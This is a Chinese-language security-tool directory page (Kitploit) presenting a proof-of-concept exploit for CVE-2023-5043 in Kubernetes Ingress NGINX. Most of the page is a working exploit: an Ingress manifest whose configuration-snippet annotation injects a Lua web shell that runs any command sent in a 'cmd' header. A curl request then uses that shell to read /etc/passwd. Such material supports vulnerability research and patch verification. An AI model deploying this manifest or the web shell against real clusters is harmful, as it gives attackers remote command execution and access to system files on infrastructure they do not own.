Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/r0binak/cve-2023-5043
容器安全漏洞分析漏洞利用Web应用程序漏洞利用云安全错误配置
GitHubr0binak/cve-2023-5043

CVE-2023-5043

针对 CVE-2023-5043 的概念验证漏洞利用,演示了通过 Kubernetes 中 Ingress NGINX 注解注入实现任意命令执行,并附带基于 curl 的 RCE 触发方式。

查看仓库
162年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2023-5043

Ingress nginx 注解注入导致任意命令执行

  1. 创建 Ingress(无需 Service 和 Pod 即可创建)
root@kitploit:~
apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
  name: ingress-exploit
  annotations:
    kubernetes.io/ingress.class: "nginx"
    nginx.ingress.kubernetes.io/configuration-snippet: |
      more_set_headers "robinak"
            proxy_pass http://upstream_balancer;
                                proxy_redirect                          off;
        }
        location /robinak/ { content_by_lua_block { local rsfile = io.popen(ngx.req.get_headers()["cmd"]);local rschar = rsfile:read("*all");ngx.say(rschar); } } location /fs/{
spec:
  rules:
  - host: robinak.me
    http:
      paths:
      - path: /
        pathType: Prefix
        backend:
          service:
            name: exploit
            port:
              number: 80
  1. 通过指定 Ingress NGINX 控制器的公共地址发起请求:
root@kitploit:~
curl -v -H 'Host: robinak.me' -H "cmd: cat /etc/passwd" http://IP/robinak/
  1. 获得 RCE 1cveed
下载工具